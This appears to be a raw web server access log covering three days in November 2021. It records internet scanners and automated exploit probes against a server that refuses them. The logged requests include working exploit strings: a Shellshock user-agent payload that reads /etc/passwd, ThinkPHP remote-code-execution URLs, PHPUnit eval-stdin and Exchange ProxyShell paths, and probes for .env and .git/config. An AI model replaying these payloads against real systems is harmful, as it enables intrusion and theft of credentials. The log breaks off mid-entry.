[28/Nov/2021:15:39:32 +0000] 400 - - http localhost "-" [Client 87.251.75.40] [Length 154] [Gzip -] "-" "-" [28/Nov/2021:18:04:43 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [28/Nov/2021:18:04:43 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [28/Nov/2021:18:04:43 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [28/Nov/2021:18:04:43 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [28/Nov/2021:18:04:43 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [28/Nov/2021:18:04:43 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [28/Nov/2021:18:33:09 +0000] 444 - GET https 64.22.31.253 "/web/index.html" [Client 92.118.160.1] [Length 0] [Gzip -] "Go http package" "-" [28/Nov/2021:18:37:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.195] [Length 0] [Gzip -] "-" "-" [28/Nov/2021:18:37:25 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.195] [Length 252] [Gzip -] "-" "-" [28/Nov/2021:18:37:26 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.195] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [28/Nov/2021:18:50:15 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.209.28] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Nov/2021:18:52:37 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.195.166] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Nov/2021:18:54:44 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.195.22] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Nov/2021:20:16:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.89.5.68] [Length 0] [Gzip -] "-" "-" [28/Nov/2021:21:09:21 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Nov/2021:21:28:27 +0000] 400 - GET http 64.22.31.253 "/manager/text/list" [Client 192.241.211.188] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Nov/2021:22:39:49 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Nov/2021:22:54:39 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [28/Nov/2021:23:09:26 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Nov/2021:23:11:29 +0000] 444 - GET https trilium.moralanimal.net "/.git/config" [Client 5.255.97.170] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [28/Nov/2021:23:14:37 +0000] 444 - GET https komga.moralanimal.net "/.git/config" [Client 185.220.101.180] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [28/Nov/2021:23:30:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.57] [Length 0] [Gzip -] "-" "-" [28/Nov/2021:23:30:15 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.57] [Length 252] [Gzip -] "-" "-" [28/Nov/2021:23:30:15 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.57] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [28/Nov/2021:23:41:45 +0000] 400 - GET http 64.22.31.253 "/actuator/" [Client 194.48.199.78] [Length 252] [Gzip -] "curl/7.64.1" "-" [29/Nov/2021:00:02:27 +0000] 444 - GET https autodiscover.moralanimal.net "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 146.0.75.135] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [29/Nov/2021:00:31:55 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.214.215] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Nov/2021:00:42:31 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Nov/2021:01:23:10 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [29/Nov/2021:02:07:38 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [29/Nov/2021:02:07:38 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [29/Nov/2021:02:46:49 +0000] 400 - GET http 64.22.31.253 "/manager/html" [Client 192.241.213.250] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Nov/2021:02:53:26 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.215.171] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Nov/2021:03:30:56 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Nov/2021:03:48:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 172.105.161.246] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Nov/2021:04:06:35 +0000] 444 - GET https tpm.moralanimal.net "/.git/config" [Client 185.100.86.74] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [29/Nov/2021:04:20:07 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Nov/2021:04:48:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 130.211.54.158] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [29/Nov/2021:05:05:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Nov/2021:05:23:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Nov/2021:06:07:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [29/Nov/2021:06:26:34 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [29/Nov/2021:06:52:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.81.150.226] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [29/Nov/2021:09:30:03 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.212.228] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Nov/2021:12:02:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.62] [Length 0] [Gzip -] "-" "-" [29/Nov/2021:12:21:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 68.183.41.215] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36 OPR/46.0.2597.57" "-" [29/Nov/2021:12:30:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.212.23] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Nov/2021:14:01:44 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 52.178.138.73] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [29/Nov/2021:14:45:34 +0000] 444 - GET https 64.22.31.253 "/cgi-bin/jarrewrite.sh" [Client 45.146.164.160] [Length 0] [Gzip -] "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'" "-" [29/Nov/2021:18:04:48 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Nov/2021:18:04:48 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Nov/2021:18:04:48 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Nov/2021:18:04:48 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Nov/2021:18:04:48 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Nov/2021:18:04:48 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Nov/2021:18:43:03 +0000] 444 - GET https 64.22.31.253 "/analytics/jbips/" [Client 194.48.199.121] [Length 0] [Gzip -] "curl/7.64.1" "-" [29/Nov/2021:19:00:04 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 92.118.160.17] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [29/Nov/2021:20:44:03 +0000] 444 - GET https guacamole.moralanimal.net "/" [Client 92.118.160.61] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [29/Nov/2021:21:12:18 +0000] 444 - GET https traefik.moralanimal.net "/" [Client 92.118.160.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [29/Nov/2021:21:54:31 +0000] 444 - POST https 64.22.31.253 "/_ignition/execute-solution" [Client 120.24.58.5] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0" "-" [29/Nov/2021:21:54:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 120.24.58.5] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0" "-" [29/Nov/2021:21:54:33 +0000] 444 - GET https 64.22.31.253 "/script" [Client 120.24.58.5] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0" "-" [29/Nov/2021:21:54:34 +0000] 444 - GET https 64.22.31.253 "/manager/html" [Client 120.24.58.5] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0" "-" [29/Nov/2021:21:54:35 +0000] 444 - GET https 64.22.31.253 "/wp-login.php" [Client 120.24.58.5] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0" "-" [29/Nov/2021:21:54:36 +0000] 444 - GET https 64.22.31.253 "/?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=kiqo9jth" [Client 120.24.58.5] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0" "-" [29/Nov/2021:21:54:37 +0000] 444 - GET https 64.22.31.253 "/users/sign_in" [Client 120.24.58.5] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0" "-" [29/Nov/2021:23:47:41 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.213.120] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Nov/2021:23:47:47 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.213.164] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Nov/2021:23:51:49 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.200.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Nov/2021:00:14:50 +0000] 444 - GET https exchange.moralanimal.net "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 146.0.75.135] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [30/Nov/2021:00:40:19 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 198.199.116.203] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Nov/2021:01:15:05 +0000] 444 - GET https guacamole.moralanimal.net "/" [Client 34.77.162.17] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [30/Nov/2021:01:27:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.114] [Length 0] [Gzip -] "-" "-" [30/Nov/2021:01:27:15 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.114] [Length 252] [Gzip -] "-" "-" [30/Nov/2021:01:27:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.42] [Length 0] [Gzip -] "-" "-" [30/Nov/2021:01:27:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.41] [Length 0] [Gzip -] "-" "-" [30/Nov/2021:01:27:16 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.42] [Length 252] [Gzip -] "-" "-" [30/Nov/2021:01:27:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.115] [Length 0] [Gzip -] "-" "-" [30/Nov/2021:01:27:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.57] [Length 0] [Gzip -] "-" "-" [30/Nov/2021:01:27:17 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.41] [Length 252] [Gzip -] "-" "-" [30/Nov/2021:01:27:18 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.115] [Length 252] [Gzip -] "-" "-" [30/Nov/2021:01:27:18 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.57] [Length 252] [Gzip -] "-" "-" [30/Nov/2021:01:27:18 +0000] 400 - GET http whoami.moralanimal.net "/" [Client 167.94.138.57] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [30/Nov/2021:01:31:53 +0000] 444 - HEAD https 64.22.31.253 "/" [Client 128.199.52.249] [Length 0] [Gzip -] "-" "-" [30/Nov/2021:02:53:00 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.213.56] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Nov/2021:03:55:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [30/Nov/2021:04:15:16 +0000] 400 - - http localhost "-" [Client 78.128.112.18] [Length 154] [Gzip -] "-" "-" [30/Nov/2021:04:18:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.140.248.32] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [30/Nov/2021:04:23:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.2] [Length 0] [Gzip -] "-" "-" [30/Nov/2021:04:26:04 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 92.118.160.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [30/Nov/2021:05:05:56 +0000] 444 - GET https owa.moralanimal.net "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 146.0.75.135] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [30/Nov/2021:05:58:57 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [30/Nov/2021:06:23:30 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5" "-" [30/Nov/2021:06:23:30 +0000] 400 - - http localhost "-" [Client 222.186.19.235] [Length 154] [Gzip -] "-" "-" [30/Nov/2021:06:27:14 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [30/Nov/2021:06:27:14 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [30/Nov/2021:06:35:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [30/Nov/2021:06:35:59 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211130143249" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [30/Nov/2021:09:13:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 118.193.45.5] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [30/Nov/2021:09:13:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 118.193.45.5] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [30/Nov/2021:09:14:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.89.5.71] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [30/Nov/2021:09:34:52 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.213.35] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Nov/2021:09:38:14 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Nov/2021:09:59:43 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Nov/2021:10:52:06 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 34.96.130.25] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [30/Nov/2021:10:55:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.35.168.80] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Nov/2021:11:30:31 +0000] 444 - GET https pop.moralanimal.net "/" [Client 34.86.35.27] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [30/Nov/2021:12:54:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.205.116] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Nov/2021:13:16:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.43] [Length 0] [Gzip -] "-" "-" [30/Nov/2021:13:16:53 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.43] [Length 252] [Gzip -] "-" "-" [30/Nov/2021:13:16:53 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/" [Client 167.94.138.43] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [30/Nov/2021:13:25:40 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [30/Nov/2021:13:56:22 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Nov/2021:14:10:52 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 35.244.94.143] [Length 0] [Gzip -] "-" "-" [30/Nov/2021:15:07:53 +0000] 400 - GET http localhost "/" [Client 143.198.46.22] [Length 252] [Gzip -] "-" "-" [30/Nov/2021:15:08:35 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Nov/2021:15:28:49 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Nov/2021:16:18:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Nov/2021:16:19:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.43] [Length 0] [Gzip -] "-" "-" [30/Nov/2021:16:19:42 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.43] [Length 252] [Gzip -] "-" "-" [30/Nov/2021:16:19:42 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.43] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [30/Nov/2021:17:04:43 +0000] 400 - GET http 64.22.31.253 "/" [Client 191.232.38.25] [Length 252] [Gzip -] "curl/7.58.0" "-" [30/Nov/2021:17:14:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Nov/2021:18:02:14 +0000] 400 - GET http localhost "/" [Client 8.218.211.249] [Length 154] [Gzip -] "-" "-" [30/Nov/2021:18:04:44 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Nov/2021:18:04:44 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Nov/2021:18:04:44 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Nov/2021:18:04:44 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Nov/2021:18:04:44 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Nov/2021:18:04:44 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [30/Nov/2021:18:34:34 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [30/Nov/2021:19:00:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Nov/2021:21:37:08 +0000] 444 - GET https 64.22.31.253 "/owa/" [Client 172.105.161.246] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [30/Nov/2021:21:42:52 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.123] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [30/Nov/2021:22:51:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.194] [Length 0] [Gzip -] "-" "-" [30/Nov/2021:22:51:44 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.194] [Length 252] [Gzip -] "-" "-" [30/Nov/2021:23:20:55 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.205.195] [Length 0] [Gzip -] "Mozilla/5.0 